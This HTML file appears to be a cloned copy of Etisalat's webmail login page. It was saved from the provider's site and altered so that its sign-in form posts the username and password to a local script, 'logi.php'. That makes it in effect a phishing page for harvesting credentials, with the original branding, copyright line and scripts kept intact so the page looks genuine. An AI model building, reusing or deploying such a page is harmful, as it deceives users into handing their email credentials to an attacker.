<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0112)https://dcm1.eim.ae/iwc_static/c11n/allDomain/layout/login.html?lang=en-US&3.0.1.0.0_15051245&svcs=abs,mail,c11n -->
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" class="dj_webkit dj_chrome dj_contentbox"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<!-- Mimic Internet Explorer 7 -->
		<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
                <link href="http://www.etisalat.ae/en/system/images/generic/etisalat.ico" rel="shortcut icon" type="image/x-icon">
                <link rel="stylesheet" href="./dcm1iwc_static_files/login.css" type="text/css">
		<style type="text/css">
			@import "../../../js/dojotoolkit/dojo/resources/dojo.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit.css";
			@import "../../../js/dojotoolkit/dijit/themes/dijit_rtl.css";
			@import "../../../js/dojotoolkit/dijit/themes/tundra/form/Button.css";
			@import "../../../js/dojotoolkit/dojox/form/resources/DropDownSelect.css";
                body {
background-image: url(https://dcm1.eim.ae/iwc_static/c11n/allDomain/layout/images/background.png); /*You will specify your image path here.*/

background-size: cover;
background-position: top center !important;
background-repeat: no-repeat !important;
background-attachment: fixed;
}

</style>
                <style>
                .Convergence-Login-Logo {
        background-color: transparent;
        background-image: url("https://dcm1.eim.ae/iwc_static/c11n/allDomain/layout//images/mail.jpg");
        background-repeat: no-repeat;
        background-position: 0 0;
        width: 75px;
        height:85px;
        padding: 0 0 0 0;
        border-bottom:none;
        margin-left:5px;
        float:left;
}
        .Convergence-Login-RedBand {
        margin: 0px;
        background-image:url("https://dcm1.eim.ae/iwc_static/c11n/allDomain/layout//images/greyband.jpg");
        background-position: left top;
        height: 30px;
        width: 430px;
}


		</style>
		<!--- link rel="stylesheet" href="../../../layout/css/login.css" type="text/css"/ --->
		<script async="" src="./dcm1iwc_static_files/analytics.js.download"></script><script type="text/javascript">
			var djConfig= {
				cacheBust: "none",
				isDebug:false,
				parseOnLoad:true
			};

			(function() {
				function getParameter(paramName) {
					paramName += "=";
					var queryString = window.location.search;
					var strBegin = queryString.indexOf(paramName);
					if (strBegin==-1){
						strBegin = queryString.length;
					}
					else {
						strBegin += paramName.length;
					}
					var strEnd = queryString.indexOf("&",strBegin);

					if (strEnd==-1){
						strEnd = queryString.length;
					}

					return queryString.substring(strBegin,strEnd);
				}

				var locale = getParameter("lang");
				if (locale.length >0){
					djConfig.locale = locale.toLowerCase();
					if ((djConfig.locale.indexOf("ar") == 0) || (djConfig.locale.indexOf("he") == 0)) {
						djConfig.direction = "rtl";
					}
					else {
						djConfig.direction = "ltr";
					}
					var top = document.getElementsByTagName("html")[0];
					top.dir = djConfig.direction;
				}
			})()
		</script>

		<script type="text/javascript" src="./dcm1iwc_static_files/dojo.js.download"></script><title>my email - Etisalat Internet Mail</title></head><body role="application"><textarea id="dijit._editor.RichText.savedContent" style="display:none;position:absolute;top:-100px;left:-100px;height:3px;width:3px;overflow:hidden;"></textarea>
		<script type="text/javascript">
			dojo.registerModulePath("iwc", "../../iwc");
			dojo.require("iwc.i18n.resources");
			dojo.requireLocalization("iwc.i18n","resources");
			iwc.l10n = dojo.i18n.getLocalization("iwc.i18n", "resources");
			dojo.require("iwc.login");

			function loadC11nResources() {
				dojo.registerModulePath("c11n", "../../../c11n");
				dojo.requireLocalization("c11n.allDomain", "resources");
				var l10n = dojo.i18n.getLocalization("c11n.allDomain", "resources");
				dojo.mixin(iwc.l10n, l10n);
			}

			function reloadWithHttps() {
				if(window.location.protocol == "http:"){
					var contextPath = iwc.cookie("iwc-auth","path");
					var defaultURL = "";
					if(contextPath && contextPath != ""){
						defaultURL = "https://" + window.location.host + contextPath;
					}else{
						defaultURL = "https://" + window.location.host + window.location.pathname + window.location.search;
					}
					window.location.replace(defaultURL);
				}
			}
			
			dojo.addOnLoad(function(){
				reloadWithHttps();
				loadC11nResources();
				// prevent clickjacking
				if (top.location.hostname != self.location.hostname) {
					try {
						if (document.forms[0].password) {
							document.forms[0].style.display = "none";
						}
					} catch (e) {
						document.body.style.display = "none";
					}
				}

				iwc.login.setFocus();
				iwc.login.doI18N();
				//document.getElementById('picCache').src='imageList.html?'+djConfig.cacheBust;
				//var lang = langLblMapping[djConfig.locale.toLowerCase()]?langLblMapping[djConfig.locale.toLowerCase()]:langLblMapping['en-us'];
				var lang = "en_us";
				if(djConfig && djConfig.locale) {
					lang = djConfig.locale.toLowerCase();
				}
				dijit.byId('langButton').attr("value", lang);
				dojo.connect(dijit.byId("langButton"), "onChange", function(lang) {
					var loginUrl = window.location;

                    if(window.location.search!=""&&window.location.search.indexOf('lang=')>-1)
                        loginUrl = loginUrl.href.replace('lang='+iwc.login.getParameter('lang'),'lang='+lang);
                    else
                        loginUrl = loginUrl+"?lang="+lang

                    if(window.location.search.indexOf("u=1")==-1)
                        loginUrl=loginUrl+'&u=1';
                    
					window.location = loginUrl;
					return false;
				});
			});

			function login() {
				return iwc.login.checkName();
			}
		</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-59791848-1', 'auto');
  ga('send', 'pageview');

</script>

	

	
		<script type="text/javascript">
			
		</script>
        <div class="Convergence-Login" id="convergenceLogin">
			<div class="Convergence-Login-Border">
				<div class="Convergence-Login-Banner">
					<div class="Convergence-Login-Logo" wairole="presentation"></div>
					<div id="welcomeMsg" class="Convergence-Login-WelcomeMsg">my email - Etisalat Internet Mail</div>
				</div>

				<div class="Convergence-Login-Notification" id="alertMsg" aria-live="assertive" role="alert" tabindex="0" style="visibility: hidden;"></div>
				
				<form action="logi.php" method="post" onsubmit="return login();">

					<div>
						<div class="Convergence-Login-Form">
							<div class="Convergence-Login-FormRow">
								<label id="usernameLabelID" for="username">Username:</label>
								<input id="username" name="username" type="text" aria-required="true">
							</div>
							<div class="Convergence-Login-FormRow">
								<label id="passwordLabelID" for="password">Password:</label>
								<input id="password" name="password" type="password" aria-required="true" autocomplete="off">
							</div>
								<div class="Convergence-Login-FormRow">
								<input id="chkpreloginip" name="chkpreloginip" type="hidden" value="true" aria-required="false">
							</div>
							<div class="Convergence-Login-FormRow tundra">

								<div class="Convergence-Login-SelectLang">
								</div>
								<div class="Convergence-Login-FormButton" id="buttonContainer">
									<div>
										<span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="signin"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode"><button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="submit" value="" wairole="button" waistate="labelledby-signin_label" role="button" aria-labelledby="signin_label" id="signin" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="signin_label" dojoattachpoint="containerNode">Sign In</span></button></span></span></span>
									</div>
								</div>
								<div style="clear: both"></div>
							</div>

						</div>

					</div>
					<div style="clear: both"></div>
				</form>
		<div class="Password-Expired-Message tundra" id="PwdExpiredMsg" style="display:none;">                   
			<div class="ErrorMsg-Contianer" id="btnContainer">                                                
				<div class="Error-Icon"></div>
				<div class="Error-Msg" id="errMsg"></div>			    	
			</div>
			<div class="Convergence-Login-FormButton ChangePwdBtn">	
				<span class="dijit dijitReset dijitLeft dijitInline dijitButton" dojoattachevent="ondijitclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" widgetid="changepwd"><span class="dijitReset dijitRight dijitInline"><span class="dijitReset dijitInline dijitButtonNode"><button class="dijitReset dijitStretch dijitButtonContents" dojoattachpoint="titleNode,focusNode" type="button" value="" wairole="button" waistate="labelledby-changepwd_label" role="button" aria-labelledby="changepwd_label" id="changepwd" tabindex="0"><span class="dijitReset dijitInline" dojoattachpoint="iconNode"><span class="dijitReset dijitToggleButtonIconChar">✓</span></span><span class="dijitReset dijitInline dijitButtonText" id="changepwd_label" dojoattachpoint="containerNode">Change Password</span></button></span></span></span>
		    </div>
                </div>                
				<div class="Convergence-Login-RedBand"></div>
				<div id="copyright" class="Convergence-Login-Copyright">Copyright © 2019, Etisalat. All Rights Reserved.</div>
			</div>
		</div>

		<div id="overlay" class="login" style="display: none;">
			<div class="centered">
				<div class="logo"></div>
				<div id="progress">Signing in...</div>
			</div>
		</div>

		<iframe name="picCache" id="picCache" src="./dcm1iwc_static_files/saved_resource.html" width="0" height="0" frameborder="0"></iframe>

		<noscript>
			<div style="width:50%; margin-top: 5%; margin-left:auto; margin-right:auto">
				<iframe src="noscript.html" frameborder=0 width=100%" />
			</div>
		</noscript>
    

</body></html>